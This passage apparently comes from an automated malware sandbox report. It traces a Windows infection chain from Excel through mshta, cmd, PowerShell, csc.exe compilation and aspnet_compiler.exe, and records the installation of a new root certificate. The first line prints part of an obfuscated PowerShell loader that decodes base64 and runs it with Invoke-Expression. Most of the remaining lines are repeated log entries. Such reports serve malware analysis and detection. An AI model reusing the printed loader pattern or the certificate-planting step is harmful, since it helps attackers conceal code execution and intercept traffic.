JyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D51F8 push ds; ret 8_2_000007FE899D5242
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D022D push eax; iretd 8_2_000007FE899D0241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D00BD pushad ; iretd 8_2_000007FE899D00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D5813 push ebx; ret 8_2_000007FE899D583A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D580D push ecx; ret 8_2_000007FE899D5812
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D583B push esp; ret 8_2_000007FE899D585A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89AA096D pushad ; ret 8_2_000007FE89AA0991
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041E922 push es; retf 27_2_0041E926
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_004032D0 push eax; ret 27_2_004032D2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00401BD8 pushad ; ret 27_2_00401BDC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_004163F3 push edi; retf 27_2_004164AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00416390 push cs; iretd 27_2_004163C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00416393 push cs; iretd 27_2_004163C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00404C4C push ebx; retf 27_2_00404CDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00416453 push edi; retf 27_2_004164AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00404C65 push ebx; retf 27_2_00404CDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00416438 push edi; retf 27_2_004164AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00423594 pushfd ; retf 27_2_00423595
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00414616 push ebp; ret 27_2_00414631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00414623 push ebp; ret 27_2_00414631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00418E31 push FFFFFFF1h; ret 27_2_00418E3C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041E6A0 pushfd ; ret 27_2_0041E6C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041EF45 push edi; retf 27_2_0041EF5F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041EF53 push edi; retf 27_2_0041EF5F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0040CFAF push esp; retf 27_2_0040CFB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7DFA1 push ecx; ret 27_2_00A7DFB4

              Persistence and Installation Behavior

              barindex
              Installs new ROOT certificates
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dllJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
